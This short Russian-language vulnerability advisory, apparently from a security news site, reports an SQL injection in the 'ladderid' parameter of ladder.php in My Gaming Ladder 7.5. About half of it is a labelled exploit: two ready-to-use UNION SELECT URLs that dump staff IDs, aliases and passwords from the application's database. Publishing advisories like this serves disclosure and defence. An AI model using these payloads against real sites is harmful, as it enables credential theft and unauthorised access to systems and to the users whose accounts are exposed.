Хакер #305. Многошаговые SQL-инъекции
Программа: My Gaming Ladder 7.5
Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения. Уязвимость существует из-за недостаточной обработки входных данных в параметре «ladderid» сценарием ladder.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.
Эксплоит:
ADMINS/STAFF: http://site.com/ladder.php?ladderid=1/**/UNION/**/ALL/* */SELECT/**/1,2,3,4,5,6,concat(0x3C666F6E7420636F6C6F723D22726564223E,id, char(58),pass,0x3C2F666F6E743E),8,9,10,11,12,13,14,15,16, 17,18,19,20,21,22,23,24/**/FROM/**/staff/*
USERS: http://site.com/ladder.php?ladderid=1/**/UNION/**/ALL/**/SELECT/* */1,2,3,4,5,6,concat(0x3C666F6E7420636F6C6F723D22726564223E, alias,char(58),pass,0x3C2F666F6E743E),8,9,10,11,12,13,14,15,16, 17,18,19,20,21,22,23,24/**/FROM/**/staff/*